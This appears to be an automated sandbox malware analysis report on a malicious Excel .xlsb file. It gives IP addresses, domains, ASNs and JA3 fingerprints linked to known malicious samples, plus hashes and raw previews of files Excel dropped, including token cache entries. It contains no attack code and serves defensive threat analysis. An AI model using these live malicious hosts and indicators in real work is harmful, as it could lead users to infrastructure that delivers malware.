HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsb
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, RuntimeBroker.exe, SIHClient.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe Excluded IPs from analysis (whitelisted): 52.109.12.20, 52.109.88.177, 2.20.84.85, 52.109.8.71, 52.113.194.132, 52.109.12.19, 51.104.15.252 Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, login.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, e1723.g.akamaiedge.net, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, prod.nexusrules.live.com.akadns.net, ris.api.iris.microsoft.com, us1.roaming1.live.com.akadns.net, onedscolprduks01.uksouth.cloudapp.azure.com, s-0005.s-msedge.net, config.officeapps.live.com, ecs.office.trafficmanager.net, nexusrules.officeapps.live.com, europe.configsvc1.live.com.akadns.net Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
192.185.209.37	UT-1658653248.xlsb	Get hash	malicious	Browse
192.185.209.37	UT-1658653248.xlsb	Get hash	malicious	Browse
128.204.218.95	UT-1658653248.xlsb	Get hash	malicious	Browse
128.204.218.95	UT-1658653248.xlsb	Get hash	malicious	Browse
162.241.203.226	UT-1658653248.xlsb	Get hash	malicious	Browse
	UT-1658653248.xlsb	Get hash	malicious	Browse
	TMIJM.cpl	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
trzgestao.com.br	UT-1658653248.xlsb	Get hash	malicious	Browse	192.185.209.37
trzgestao.com.br	UT-1658653248.xlsb	Get hash	malicious	Browse	192.185.209.37
keylessguard.com	UT-1658653248.xlsb	Get hash	malicious	Browse	128.204.218.95
keylessguard.com	UT-1658653248.xlsb	Get hash	malicious	Browse	128.204.218.95
as4estacoes.pt	UT-1658653248.xlsb	Get hash	malicious	Browse	162.241.203.226
as4estacoes.pt	UT-1658653248.xlsb	Get hash	malicious	Browse	162.241.203.226

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
OIS1US	UT-1658653248.xlsb	Get hash	malicious	Browse	162.241.203.226
	UT-1658653248.xlsb	Get hash	malicious	Browse	162.241.203.226
	xzeVpTyxJw.exe	Get hash	malicious	Browse	162.241.85.30
	G-1715033342.xlsb	Get hash	malicious	Browse	162.241.2.243
	G-1715033342.xlsb	Get hash	malicious	Browse	162.241.2.243
	counter-1204824258.xls	Get hash	malicious	Browse	162.241.2.78
	counter-1212868088.xls	Get hash	malicious	Browse	162.241.2.78
	counter-1204824258.xls	Get hash	malicious	Browse	162.241.2.78
	counter-1212868088.xls	Get hash	malicious	Browse	162.241.2.78
	counter-1168389440.xls	Get hash	malicious	Browse	162.241.2.78
	G-1389515931.xlsb	Get hash	malicious	Browse	162.241.2.243
	counter-1176252564.xls	Get hash	malicious	Browse	162.241.2.78
	G-1389515931.xlsb	Get hash	malicious	Browse	162.241.2.243
	counter-1168389440.xls	Get hash	malicious	Browse	162.241.2.78
	counter-1190346578.xls	Get hash	malicious	Browse	162.241.2.78
	counter-1176252564.xls	Get hash	malicious	Browse	162.241.2.78
	counter-1201078904.xls	Get hash	malicious	Browse	162.241.2.78
	counter-1190346578.xls	Get hash	malicious	Browse	162.241.2.78
	counter-1201078904.xls	Get hash	malicious	Browse	162.241.2.78
	G-1301188399.xlsb	Get hash	malicious	Browse	162.241.2.243
ECO-ATMAN-PLECO-ATMAN-PL	UT-1658653248.xlsb	Get hash	malicious	Browse	128.204.218.95
	UT-1658653248.xlsb	Get hash	malicious	Browse	128.204.218.95
	dqnskKAmQq	Get hash	malicious	Browse	31.186.82.7
	YLUHj9C3id	Get hash	malicious	Browse	31.186.82.9
	NMtuHNXbEC	Get hash	malicious	Browse	31.186.82.6
	Tz8eRwnGhm.exe	Get hash	malicious	Browse	85.232.241.218
	arm_crypt.exe	Get hash	malicious	Browse	85.232.241.218
	ransomware.exe	Get hash	malicious	Browse	85.232.241.218
	jbs.exe	Get hash	malicious	Browse	85.232.241.218
	plusnew.exe	Get hash	malicious	Browse	85.232.241.218
	http://greatbks.net/perl/data/maria88.php	Get hash	malicious	Browse	85.194.240.246
	http://www.mbcsportsplus.com	Get hash	malicious	Browse	85.194.242.103
	http://investips.my	Get hash	malicious	Browse	85.194.243.239
	http://investips.my	Get hash	malicious	Browse	85.194.243.23
	29SCAN 0750.exe	Get hash	malicious	Browse	31.186.83.114
	http://142.93.246.184/code8555/	Get hash	malicious	Browse	85.194.240.137
	19IMG-4767954JPG.exe	Get hash	malicious	Browse	31.186.83.114
	http://photobucket.com/user/nikkireed11/library	Get hash	malicious	Browse	31.186.87.67
	http://212.174.225.94	Get hash	malicious	Browse	31.186.86.143
	www.wsop.com	Get hash	malicious	Browse	31.186.86.143
UNIFIEDLAYER-AS-1US	UT-1658653248.xlsb	Get hash	malicious	Browse	192.185.209.37
	UT-1658653248.xlsb	Get hash	malicious	Browse	192.185.209.37
	g1STq32s3M.exe	Get hash	malicious	Browse	162.241.225.135
	XUHrxtGebV.exe	Get hash	malicious	Browse	192.185.131.238
	60JhBLzVdw.exe	Get hash	malicious	Browse	162.241.169.22
	DJEu0gCilD.exe	Get hash	malicious	Browse	162.241.244.46
	Gonderi.xls	Get hash	malicious	Browse	192.185.115.3
	FARIDA GHCU123.doc	Get hash	malicious	Browse	162.241.169.22
	Gonderi.xls	Get hash	malicious	Browse	192.185.115.3
	G-1715033342.xlsb	Get hash	malicious	Browse	50.116.112.102
	Gonderi.xls	Get hash	malicious	Browse	192.185.115.3
	PP-1294117021.xlsb	Get hash	malicious	Browse	50.116.86.94
	G-1715033342.xlsb	Get hash	malicious	Browse	50.116.112.102
	AWB 00577566664315.exe	Get hash	malicious	Browse	192.185.84.191
	vbc.exe	Get hash	malicious	Browse	67.20.76.172
	OQjpM0PPCp.dll	Get hash	malicious	Browse	162.241.33.132
	zNMgAlNt7a.dll	Get hash	malicious	Browse	162.241.33.132
	OQjpM0PPCp.dll	Get hash	malicious	Browse	162.241.33.132
	zNMgAlNt7a.dll	Get hash	malicious	Browse	162.241.33.132
	#Ud83d#Udcc4 PO_45823.xlsx.html	Get hash	malicious	Browse	192.254.234.75

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
6271f898ce5be7dd52b0fc260d0662b3	PE-1264492487.xlsb	Get hash	malicious	Browse	162.241.203.226 192.185.209.37 128.204.218.95
	sw-1399887910.xlsb	Get hash	malicious	Browse	162.241.203.226 192.185.209.37 128.204.218.95
	f-1060054420.xlsb	Get hash	malicious	Browse	162.241.203.226 192.185.209.37 128.204.218.95
	miss-1039324831.xls	Get hash	malicious	Browse	162.241.203.226 192.185.209.37 128.204.218.95
	powTubeDoor.dll	Get hash	malicious	Browse	162.241.203.226 192.185.209.37 128.204.218.95
	zes2.dll	Get hash	malicious	Browse	162.241.203.226 192.185.209.37 128.204.218.95
	Ujym4APzhW.dll	Get hash	malicious	Browse	162.241.203.226 192.185.209.37 128.204.218.95
	uM6DtKiKqd.dll	Get hash	malicious	Browse	162.241.203.226 192.185.209.37 128.204.218.95
	2xM87kLoWc.dll	Get hash	malicious	Browse	162.241.203.226 192.185.209.37 128.204.218.95
	Amplex_August report.xlsb	Get hash	malicious	Browse	162.241.203.226 192.185.209.37 128.204.218.95
	rufus-3.13.exe	Get hash	malicious	Browse	162.241.203.226 192.185.209.37 128.204.218.95
	rufus.exe	Get hash	malicious	Browse	162.241.203.226 192.185.209.37 128.204.218.95
	rufus-3.14.exe	Get hash	malicious	Browse	162.241.203.226 192.185.209.37 128.204.218.95
	rufus-3.12.exe	Get hash	malicious	Browse	162.241.203.226 192.185.209.37 128.204.218.95
	1595706157-485.xlsb	Get hash	malicious	Browse	162.241.203.226 192.185.209.37 128.204.218.95
	ew28031.xlsb	Get hash	malicious	Browse	162.241.203.226 192.185.209.37 128.204.218.95
	rufus-3.14.exe	Get hash	malicious	Browse	162.241.203.226 192.185.209.37 128.204.218.95
	aim-1028486377.xlsb	Get hash	malicious	Browse	162.241.203.226 192.185.209.37 128.204.218.95
	rufus-3.14p.exe	Get hash	malicious	Browse	162.241.203.226 192.185.209.37 128.204.218.95
	rufus-3.14p.exe	Get hash	malicious	Browse	162.241.203.226 192.185.209.37 128.204.218.95

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\FontCache\4\Catalog\ListAll.Json Download File
Process:	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	379722
Entropy (8bit):	4.9088149211082355
Encrypted:	false
SSDEEP:	1536:MApDpphudnceJZezca9uRszBEmj6QkjfoJ5Jj7DMnDAYRbLSm5rYOLdHKmC9:lDThumeGzcTRszB7DkjfaJj76RbNbLW9
MD5:	E9FB5A0DF105C6F7F80E8B650DF56AAB
SHA1:	0B7F6ADA05673F2535E61267C3CB428489ECEB55
SHA-256:	A24470762A1F9F5F069C0F70EF53D693D08B7C99797935800FF294BD3B2566F3
SHA-512:	65C83135CE550981ED88CB4A83127CB3C94D5C616F26B05185FCC129E5201A88EB0A1351D144E1511B50ADB388071BFCC60388FDD613EBBA5B202FFC76F7D42B
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	{"MajorVersion":4,"MinorVersion":17,"Expiration":14,"Fonts":[{"a":[4294966911],"f":"Abadi","fam":[],"sf":[{"c":[1,0],"dn":"Abadi","fs":32696,"ful":[{"lcp":983040,"lsc":"Latn","ltx":"Abadi"}],"gn":"Abadi","id":"23643452060","p":[2,11,6,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":26215680},{"c":[1,0],"dn":"Abadi Extra Light","fs":22180,"ful":[{"lcp":983041,"lsc":"Latn","ltx":"Abadi Extra Light"}],"gn":"Abadi Extra Light","id":"17656736728","p":[2,11,2,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":13108480}]},{"a":[4294966911],"f":"Agency FB","fam":[],"sf":[{"c":[536870913,0],"dn":"Agency FB Bold","fs":54372,"ful":[{"lcp":983042,"lsc":"Latn","ltx":"Agency FB"}],"gn":"Agency FB","id":"31150835240","p":[2,11,8,4,2,2,2,2,2,4],"sub":[],"t":"ttf","u":[3,0,0,0],"v":67502,"w":45875968},{"c":[536870913,0],"dn":"Agency FB","fs":52680,"ful":[{"lcp":983042,"lsc":"Latn","ltx":"Agency FB"}],"gn":"Agency FB","id":"29260917085","p":[2,11,5,3,2,2,2,2,

C:\Users\user\AppData\Local\Microsoft\FontCache\4\PreviewFont\flat_officeFontsPreview_4_17.ttf Download File
Process:	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	TrueType Font data, 10 tables, 1st "OS/2", 7 names, Microsoft, language 0x409, \251 2018 Microsoft Corporation. All Rights Reserved.msofp_4_17RegularVersion 4.17;O365
Category:	dropped
Size (bytes):	672416
Entropy (8bit):	6.566110770587873
Encrypted:	false
SSDEEP:	12288:/3zUbLds556T1BEFGHtASk3+/KLQ/zp1km/WJ1ov0mPqxXE/RoVZPE9Ob:/Qfds5opwSL1kovT92
MD5:	4DFB7AADD4771ADDF1BA168C12DEDBF3
SHA1:	B379DC0E19FE0F51E77305BE0A7F3421B80E8A0F
SHA-256:	DB9B46CC2132D76EF90CA9A59AF03CB478BB91EA2CDA3E8E42DD0801873416E2
SHA-512:	1C5AE2C794017A81A4232A2EF43725A0DA30F9672123940D85D34A4A77744D2D7ECA5FFE9A91E2FEDDBDBADE4EEAD6AB80E565C1F8FBB813C5A2BC25F7F0A359
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	........... OS/29.P...(...`cmap.s.........pglyf..e.......0.head-@;,.......6hheaE.@B.......$hmtx...........ploca..@....h...tmaxp........... name.T+...A\|....post...<..B.... ........Me.._.<...........<.............Aa.x.................Q....Aa....Aa.........................~...........................j.......................3..............................MS .@.......(...Q................. ...........d.......0...J.......8...>..........+a..#...,................K.......z...............N.........!...-...+....z.......h..%^..3...&j..+...+%.."....................l......$A...,.......g...&...=.......X..&..............&...(B...............#.......j...............+...P...5...@...)..........#...............N...7......<...;>.............. ]...........5......#....s.......$.......$.......^...................H.......%...7.......6.......O...V...........K.......c......!...........$...&...p..+<..+...-....q.......O...................F..(....5..0K..$...0V...k..e...o...........S......0..0...*M......9...

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\ACDF58C9-64EE-4279-AA45-67DD452CFF27 Download File
Process:	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	141955
Entropy (8bit):	5.355238833544982
Encrypted:	false
SSDEEP:	1536:HcQIfgdkBEA3guwtnQ9DQW+zUk4F77nXmvidAX4Ewr7mE9:15Q9DQW+ztXd2
MD5:	A3303935EC626E6C92FFE20DF2F9E6D4
SHA1:	9CA1D6114D34317B7E8CADB96664062FEA9E6C2A
SHA-256:	D4A07F35AB7839D70E7A37604B1FE3408A0A25D7695F46840DB08CF49154854D
SHA-512:	BBF3003BE74B9EF5F0D288C73EB2AE5CA5F77A0866CBB65A834B0B0B0B225156EACFC6DD63C171F4E762E8B63F7E19E976DDCE147F59A3E092FC1BCF000273D2
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-12-16T12:59:13">.. Build: 16.0.14812.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml Download File
Process:	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	XML 1.0 document, ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	317015
Entropy (8bit):	5.170002845017304
Encrypted:	false
SSDEEP:	1536:42/zodZprxlwPX1u6uSivsUQK75IthvCnF2XuN:VarxlwPX1u6uSivsUQK75IthFXU
MD5:	02767E870CD12621A9BB0CF990CA5512
SHA1:	BE9811D858AAF049BC6D80C3CD494CB593897A4B
SHA-256:	662FF9CDCB78940CA1514E1E2B1CB9CDD7E18395E974329F12B664AAA407BAA9
SHA-512:	BCB95B5AAFA654859C8C1833D82AEE88F6A69EBC53FBD82841D638B42B3C761410909994C3E8985BAF5B11204237A8E367FE307466A85E5206BE0A3E35F25078
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?><Rules xmlns="urn:Rules"><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU" xmlns=""><S><Etw T="1" E="159" G="{02fd33df-f746-4a10-93a0-2bc6273bc8e4}" /><F T="2"><O T="AND"><L><O T="NE"><L><S T="1" F="Warning" /></L><R><V V="37" T="U32" /></R></O></L><R><O T="NE"><L><S T="1" F="Warning" /></L><R><V V="29" T="U32" /></R></O></R></O></F><TI T="3" I="10min" /><A T="4" E="TelemetrySuspend" /><A T="5" E="TelemetryShutdown" /></S><G I="true" R="TriggerOldest"><S T="2"><F N="RuleID" /><F N="RuleVersion" /><F N="Warning" /><F N="Info" /></S></G><C T="U32" I="0" O="false" N="ErrorCount"><C><S T="2" /></C></C><C T="U32" I="1" O="false" N="ErrorRuleId"><S T="2" F="RuleID" /></C><C T="U16" I="2" O="false" N="ErrorRuleVersion"><S T="2" F="RuleVersion" /></C><C T="U8" I="3" O="false" N="WarningInfo"><S T="2"

C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db-shm Download File
Process:	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.03556172285978935
Encrypted:	false
SSDEEP:	3:Gtl8/Q954/tl8/Q9hXJ89//Wlkl:GtGYgtGYJ89Xis
MD5:	4FDFF63EB8045B8003042CCA579DD874
SHA1:	A3D240E1C40FD60A237DA1E462E6EE9695CAB27F
SHA-256:	D07184FE8CA81F8D6B11AC7F7AFF02EC159D83FCE4733FA7DC1B5CC7B0906AF5
SHA-512:	65356A27F23F74C1A37BEAFED200621A51E7E9FC1B2341A29ACA79033A276D4D46D5BB917714F93F0299E5A65BC4CA4EA183E49793618202E808A42E964204A8
Malicious:	false
Reputation:	low
Preview:	..-.......................w.Z..Lo..gK.c....~.=>..-.......................w.Z..Lo..gK.c....~.=>........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db-wal Download File
Process:	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	SQLite Write-Ahead Log, version 3007000
Category:	modified
Size (bytes):	4152
Entropy (8bit):	1.3821891802688566
Encrypted:	false
SSDEEP:	12:KNHCmqtZeY4syJttJxUSo0x9DdN1tDEX4vcImm5RyZkFv4sbf:KNHDqt8VtbDBtDi4kZERDf
MD5:	EBEC87AC678C941BA8DC2F36BC91A8D3
SHA1:	5B740E3D48C944D7CC4909C59E8092315B84F351
SHA-256:	0410D39B15E9055D0806B0129058CDC39F406BE18CA2FD8951FCC5137958A319
SHA-512:	4148FD86D42C5AE86E06944E2FEF35912A1BAC721108AFD7F60C420CC38AFC8A7D790221C65627027CC758DD8D12B000C4E39A3CE4D22B6760F42EE15367BFA3
Malicious:	false
Preview:	7....-..........Lo..gK.c..r_...k........Lo..gK.c.w....ZSQLite format 3......@ .......................................................................... ..........#.....g............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres Download File
Process:	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	2278
Entropy (8bit):	3.848543484956658
Encrypted:	false
SSDEEP:	48:uiTrlKxsxxdxl9Il8u5shc0asoU6GmN3g1yuFtd1rc:vZYPshc9soU7CQ132
MD5:	E177AA78315161D155642673D2B28FC9
SHA1:	25BBFD4421DB11E099C6FF4EB5E70301C114DC8D
SHA-256:	C1156E9C20E3869B5FF012C17EBEC731FC4A47A0F41EBA1A82ABFBEA66681D37
SHA-512:	261E057838A0C5955538A52476DAEA46DA6C86BA42AA4292F85B2BB5E4FA3B2B7E5A26C252664BA6F72DBB08DB9DB8EDFBBE42D0CE9725EEF236A95B5042BB42
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".C.J.1.m.u.g.S.o.z.s.S.9.x.S.Z./.Q.v.O.c.+.E.J.4.u.2.c.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.L.r.L.j.N.D.y.1.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.5.l.c.B.l.v.

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\9aad439831564ef9f88438a70a63c87e26ef3852.tbres Download File
Process:	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	3902
Entropy (8bit):	3.9849714057023182
Encrypted:	false
SSDEEP:	48:uiTrlKxzpxtxD9Il8u5sX+0C3wRUz4nBtwcfrlAkeLy6eaUjcuEPI3f4Vs7aJLRm:GnYPsu0CA6i+ExS9VUjcuOif4We51mp
MD5:	539419A0E248B1D21C80DF2113E6B629
SHA1:	A982698BC752B8B3224C2024959C80853CB2790B
SHA-256:	486E55B5455B7DD33A1955D4B3B0F3D96C26BEE9884359A2BE8D1008DBD873C8
SHA-512:	346F251ACF3E6DFB707FF544BF39F9F63491900AC80900E9FE7721260552660DA69B9B12052001DEFC8C6D4E87695D94D11B4B0839084A9814CECDF6CD3F6FA8
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".m.q.1.D.m.D.F.W.T.v.n.4.h.D.i.n.C.m.P.I.f.i.b.v.O.F.I.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".x.a.k.C.c.s.j.y.1.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.5.l.c.B.l.v.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\6851A68A.jpg Download File
Process:	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 1095x684, frames 3
Category:	dropped
Size (bytes):	121723
Entropy (8bit):	7.789863046375973
Encrypted:	false
SSDEEP:	3072:LK/FGOztQNL0cBLJUq1dJZvPpz7+fp7Kr:G/0OzSNLJNUydJZvPZC1Kr
MD5:	50396C7F5D39B86CAC1FD6E6BA0D3767
SHA1:	B6739CC90ED799D83CC90A084C9C027485D0ED7E
SHA-256:	94DCB9DB24694279CABCC4E2D46E6A2F2485207511D1B74ADF8EE047D637084B
SHA-512:	9776DCF7DB16F9DC02A30C9E5C756B166ACE50BA9D193374562773768CE081CBDA349FC2DB3C232DB73BFAF6C17075EAF1B4CEA183EBF1B9C95921C1C92A224C
Malicious:	false
Preview:	......JFIF.....`.`.....ZExif..MM..................J............Q...........Q...........Q..........................C....................................................................C.........................................................................G.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..F....w.....+...2z.zo.$:...5.....o.....7.k.+.].....s;I....Hu...j......G.$:...5.....tR.r~.W..........?.%....Hu...j......T.]..............A.C..._.h....P......../.5N.9..>.W..........?.%....Hu...j......T.]..............A.C..._.h....P......../.5N.9..>.W..........?.%....H

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\UT-1759246356.LNK Download File
Process:	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Jun 8 14:37:22 2021, mtime=Thu Dec 16 20:59:13 2021, atime=Thu Dec 16 11:56:46 2021, length=138856, window=hide
Category:	dropped
Size (bytes):	1234
Entropy (8bit):	4.725699500908677
Encrypted:	false
SSDEEP:	24:86sKzq/f+8a+o8IHQpyALQwVlbabwMb1m2:8P95aH80QpRLQYlba0M5
MD5:	F1893701A901B4AAF6B4BD34E8151C7E
SHA1:	0A2DB60EDA53C486834DE103C5956E27890BC7A0
SHA-256:	7BA75968F2BF860F6AF02614AE63A2807D4D46E6D31ACFD61BA6ABEB26BFA0A6
SHA-512:	C8A885EB04F2502EC2F8C4D4F7630ACAF77FFC281D68B8DFB7E526407762F293CD9CA36DB1817D5D69102FAE1467638837E8DAC9D439EED40CE57330E716E8DE
Malicious:	false
Preview:	L..................F.... ...\|..,\|\.....).....z.b\|...h.......................Q....P.O. .:i.....+00.../C:\...................x.1......R\|y..Users.d......sN.$.S#.....U...............:.......A.U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....V.1......R.\|..user.@.......RDy.S#......[......................U.a.l.f.r.e.d.o.......1......S'...DOWNLO~1..l.......RDy.S'.....................B.....\w..D.o.w.n.l.o.a.d.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.8.....^.1......S'...VTLVWU~1..F......S'..Sf......l......................u.v.T.l.V.W.u.j.W.H.A.....r.2.h....S.g .UT-175~1.XLS..V.......R.\|.Sf......U....................~-..U.T.-.1.7.5.9.2.4.6.3.5.6...x.l.s.b.......g...............-.......f...........;S.......C:\Users\user\Downloads\vTlVWujWHA\UT-1759246356.xlsb..6.....\.....\.....\.....\.....\.D.o.w.n.l.o.a.d.s.\.v.T.l.V.W.u.j.W.H.A.\.U.T.-.1.7.5.9.2.4.6.3.5.6...x.l.s.b...........................M7?.eE.d9.^F{....`.......X.......701188..........N...n..O...}R...3.oV.^......).].N...n..O

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	78
Entropy (8bit):	4.926257751319366
Encrypted:	false
SSDEEP:	3:bDuMJloWQcBTDd64omxW7WQcBTDd64ov:bCY1d5IM1d5y
MD5:	A77D91520876256432FE4FF797E40E37
SHA1:	A8BE8AA3D8E4D06629443CAE27923798C5F8DBB7
SHA-256:	C281F0315999C3A8A414932A86085F331FE113BAF1D9FBCBCDFCBF3911F19386
SHA-512:	860821C28939DA65D5C7C90FD6230A343028AB3E3DB5E8501E9AB756B9798CF29CE88311D0BC1C2CA03E91BD229CF5271352102FE064EEC6981297F16BCE9875
Malicious:	false
